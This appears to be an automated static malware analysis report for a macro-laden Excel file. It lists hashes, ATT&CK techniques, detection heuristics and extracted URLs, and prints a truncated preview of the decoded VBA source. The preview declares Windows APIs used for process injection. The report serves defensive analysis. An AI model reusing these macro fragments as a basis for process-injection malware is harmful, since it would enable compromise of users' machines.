Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 df0ce5e374f9ff6a…

MALICIOUS

Office (OOXML)

56.8 KB Created: 2021-09-28 07:50:26 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-10-04
MD5: 4c6e19cd2ac90e7eab01be64492be201 SHA-1: 26f0bed2ba549def4086ad8f094269b03f973cd4 SHA-256: df0ce5e374f9ff6a19bfe6972fba1997241bade22dafa3910269336625a3068c
122 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1059.003 Windows Command Shell

The sample contains VBA macros that reference cmd.exe and PowerShell, indicating an intent to execute commands. The macro code appears to be truncated, but the presence of API calls like RtlMoveMemory and CreateProcess suggests it is designed to download and execute a second-stage payload. The benign URLs extracted do not appear to be directly related to the malicious functionality.

Heuristics 4

  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.nirsoft.net/kernel_struct/vista/IMAGE_DOS_HEADER.html In document text (OOXML body / shared strings)
    • https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680305(v=vs.85).aspxIn document text (OOXML body / shared strings)
    • https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680313(v=vs.85).aspxIn document text (OOXML body / shared strings)
    • https://msdn.microsoft.com/en-us/library/windows/desktop/ms680339(v=vs.85).aspxIn document text (OOXML body / shared strings)
    • https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680336(v=vs.85).aspxIn document text (OOXML body / shared strings)
    • https://www.nirsoft.net/kernel_struct/vista/IMAGE_SECTION_HEADER.htmlIn document text (OOXML body / shared strings)
    • https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms684873(v=vs.85).aspxIn document text (OOXML body / shared strings)
    • https://msdn.microsoft.com/en-us/library/windows/desktop/ms686331(v=vs.85).aspxIn document text (OOXML body / shared strings)
    • https://www.nirsoft.net/kernel_struct/vista/FLOATING_SAVE_AREA.htmlIn document text (OOXML body / shared strings)
    • https://msdn.microsoft.com/en-us/library/windows/desktop/ms679284(v=vs.85).aspxIn document text (OOXML body / shared strings)
    • https://www.nirsoft.net/kernel_struct/vista/IMAGE_DOS_HEADER.html�In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 52518 bytes
SHA-256: f087d651e96d5fe629c89b5dde4f4d1855aea0b9fc03f03aa56ffbc72287b50b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Option Explicit

' ================================================================================
'                      ~~~ IMPORT WINDOWS API FUNCTIONS ~~~
' ================================================================================
#If Win64 Then
    Private Declare PtrSafe Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByVal sSource As LongPtr, ByVal lLength As Long)
    Private Declare PtrSafe Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As LongPtr, ByVal lpFilename As String, ByVal nSize As Long) As Long
    Private Declare PtrSafe Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
    Private Declare PtrSafe Function GetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, ByVal lpContext As LongPtr) As Long
    Private Declare PtrSafe Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As LongPtr) As Long
    Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function VirtualFree Lib "KERNEL32" (ByVal lpAddress As LongPtr, dwSize As Long, dwFreeType As Long) As Long
    Private Declare PtrSafe Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As LongPtr) As Long
    Private Declare PtrSafe Function SetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, ByVal lpContext As LongPtr) As Long
    Private Declare PtrSafe Function ResumeThread Lib "KERNEL32" (ByVal hThread As LongPtr) As Long
    Private Declare PtrSafe Function TerminateProcess Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal uExitCode As Integer) As Long
#Else
    Private Declare Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As Long, ByVal sSource As Long, ByVal lLength As Long)
    Private Declare Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long
    Private Declare Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
    Private Declare Function GetThreadContext Lib "KERNEL32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
    Private Declare Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As LongPtr) As Long
    Private Declare Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private 
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 115200 bytes
SHA-256: ef4ed641076a54c77dfdf7f3c2031e8b9f01cd0d4037065db283a306021a3447

Open this report in the interactive analyzer, or submit your own file for analysis.